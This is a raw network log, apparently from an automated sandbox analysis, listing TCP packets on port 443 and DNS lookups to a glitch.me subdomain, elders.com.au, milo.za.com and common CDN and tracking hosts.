                                                                                                                                    Nov 5, 2024 09:03:24.848707914 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.849078894 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.849128962 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.849330902 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.849373102 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.859147072 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859348059 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859379053 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859406948 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.859417915 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859467030 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.859608889 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859909058 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859940052 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859951019 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.859957933 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.859997034 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.860228062 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.866138935 CET49914443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.866149902 CET44349914162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.866242886 CET49914443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.866765976 CET49914443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.866777897 CET44349914162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.871335983 CET44349901162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.872369051 CET49903443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.872678995 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.872685909 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.875327110 CET44349902162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.876806974 CET49894443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.876812935 CET4434989413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.885432959 CET49915443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.885449886 CET4434991513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.885720015 CET49915443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.886171103 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.886188984 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.886254072 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.886262894 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.886302948 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.886316061 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.886359930 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.886363029 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.886409998 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.887612104 CET49887443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.887617111 CET4434988713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.895657063 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.895675898 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.895699978 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.895725965 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.895734072 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.895750046 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.895766020 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.895785093 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.899693012 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.899722099 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.899760962 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.899770021 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.899811029 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.899827003 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.900666952 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.900675058 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.903276920 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.903326035 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.914818048 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.944171906 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.944192886 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.944247007 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.944257975 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.944293976 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.944303036 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.945580959 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.945600986 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.945687056 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.945698023 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.945740938 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:24.946404934 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.946470022 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.946501017 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.946521044 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.946526051 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.946770906 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.946774960 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.947402000 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.947433949 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.947442055 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.947448969 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.947482109 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.947489023 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.948014975 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.948048115 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.948092937 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.948098898 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.948180914 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.948421955 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.951328993 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.951860905 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:24.953362942 CET49915443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:24.953375101 CET4434991513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.963074923 CET44349902162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.963150978 CET44349902162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.963224888 CET49902443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.963881016 CET4434989934.251.39.134192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.964685917 CET44349906162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.965938091 CET44349903162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.965986967 CET44349903162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.966044903 CET49903443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.971568108 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.971627951 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.972011089 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.972062111 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.972208977 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.972261906 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.972709894 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.972785950 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:24.973418951 CET44349901162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.973455906 CET44349901162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.973500967 CET49901443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.973510027 CET44349901162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.973520994 CET44349901162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.973551989 CET49901443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.978436947 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.978451967 CET44349906162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.978671074 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:24.978678942 CET4434989934.251.39.134192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.979521990 CET44349906162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.979573011 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.979722023 CET4434989934.251.39.134192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.979777098 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:24.980492115 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.980741978 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.980787992 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.980793953 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981080055 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.981136084 CET44349906162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981301069 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981333971 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981368065 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.981374979 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981427908 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.981434107 CET44349906162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981443882 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.981657982 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981724977 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981755018 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981769085 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.981774092 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.981801033 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.982172966 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.990796089 CET44349905162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.998980999 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:24.998987913 CET44349905162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:24.999985933 CET44349905162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.000062943 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.000376940 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.000439882 CET44349905162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.000550985 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.000557899 CET44349905162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.002464056 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:25.002540112 CET4434989934.251.39.134192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.002752066 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:25.002763033 CET4434989934.251.39.134192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.023879051 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.023900986 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.023932934 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:25.023946047 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.023957968 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:25.023979902 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:25.027112007 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.027121067 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.027147055 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.027163029 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:25.027177095 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.027188063 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.027209997 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:25.027223110 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:25.027228117 CET44349886157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.029510021 CET49906443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.029510975 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.029515982 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.040873051 CET49905443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.059607983 CET49899443192.168.2.434.251.39.134
                                                                                                                                    Nov 5, 2024 09:03:25.068823099 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069051027 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069092989 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.069099903 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069217920 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069252014 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.069256067 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069263935 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069287062 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069325924 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:25.069334030 CET44349885157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.069360971 CET49885443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:25.070915937 CET49886443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:25.070935011 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.070939064 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.070992947 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.070997953 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072000027 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072046995 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.072052002 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072822094 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072835922 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072837114 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072906971 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:25.072915077 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072942972 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:25.072942972 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.072951078 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.072959900 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:25.073790073 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.073815107 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.073843956 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.073848009 CET44349897162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.074043036 CET49897443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:25.095518112 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.095575094 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:25.095854044 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.095906019 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:25.096499920 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.096530914 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.096573114 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:25.096573114 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:25.096586943 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.096622944 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:25.097106934 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.097168922 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:25.097176075 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.097193003 CET44349889104.17.247.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.097235918 CET49889443192.168.2.4104.17.247.203
                                                                                                                                    Nov 5, 2024 09:03:25.102160931 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.102252007 CET44349895162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:25.102310896 CET49895443192.168.2.4162.159.140.34
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Nov 5, 2024 09:02:15.148552895 CET192.168.2.41.1.1.10x7953Standard query (0)astonishing-maize-sunstone.glitch.meA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:15.148689032 CET192.168.2.41.1.1.10x3551Standard query (0)astonishing-maize-sunstone.glitch.me65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.369532108 CET192.168.2.41.1.1.10x2b0dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.369719028 CET192.168.2.41.1.1.10x2bf8Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.467489004 CET192.168.2.41.1.1.10x7d43Standard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:16.467647076 CET192.168.2.41.1.1.10x58f6Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.381608009 CET192.168.2.41.1.1.10x5732Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.382061005 CET192.168.2.41.1.1.10x2129Standard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.536950111 CET192.168.2.41.1.1.10xea7fStandard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:18.537503958 CET192.168.2.41.1.1.10xc939Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:19.182796001 CET192.168.2.41.1.1.10x9b57Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:19.182959080 CET192.168.2.41.1.1.10xf7dcStandard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:21.066764116 CET192.168.2.41.1.1.10x51fbStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:21.068461895 CET192.168.2.41.1.1.10x9ab1Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.322422028 CET192.168.2.41.1.1.10x8323Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.322422028 CET192.168.2.41.1.1.10x6b8fStandard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.336497068 CET192.168.2.41.1.1.10x9a56Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:22.336497068 CET192.168.2.41.1.1.10xd962Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:23.991080999 CET192.168.2.41.1.1.10xaa59Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:23.991477013 CET192.168.2.41.1.1.10x72b9Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:36.979408026 CET192.168.2.41.1.1.10x32ebStandard query (0)milo.za.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:36.979408026 CET192.168.2.41.1.1.10x5dd8Standard query (0)milo.za.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:38.951484919 CET192.168.2.41.1.1.10x17f6Standard query (0)milo.za.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:02:38.951598883 CET192.168.2.41.1.1.10xb754Standard query (0)milo.za.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:15.784219027 CET192.168.2.41.1.1.10x1262Standard query (0)elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:15.784472942 CET192.168.2.41.1.1.10xfe5cStandard query (0)elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.953098059 CET192.168.2.41.1.1.10xb1bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.953257084 CET192.168.2.41.1.1.10x393cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.954689980 CET192.168.2.41.1.1.10xa3f9Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:16.954997063 CET192.168.2.41.1.1.10xc0f8Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:17.446432114 CET192.168.2.41.1.1.10xdb01Standard query (0)elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:17.447319984 CET192.168.2.41.1.1.10x17a6Standard query (0)elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:19.397888899 CET192.168.2.41.1.1.10x692fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:19.398577929 CET192.168.2.41.1.1.10x7dc7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.487235069 CET192.168.2.41.1.1.10x207cStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.487831116 CET192.168.2.41.1.1.10x6eb8Standard query (0)unpkg.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.488879919 CET192.168.2.41.1.1.10x6e3cStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.490555048 CET192.168.2.41.1.1.10x98b9Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.502899885 CET192.168.2.41.1.1.10xd56cStandard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.503387928 CET192.168.2.41.1.1.10xcaa3Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.515018940 CET192.168.2.41.1.1.10xdb12Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:20.515737057 CET192.168.2.41.1.1.10x24c0Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.187935114 CET192.168.2.41.1.1.10x3ee5Standard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.188323975 CET192.168.2.41.1.1.10xc5daStandard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.191575050 CET192.168.2.41.1.1.10x44fbStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:22.192027092 CET192.168.2.41.1.1.10x3066Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
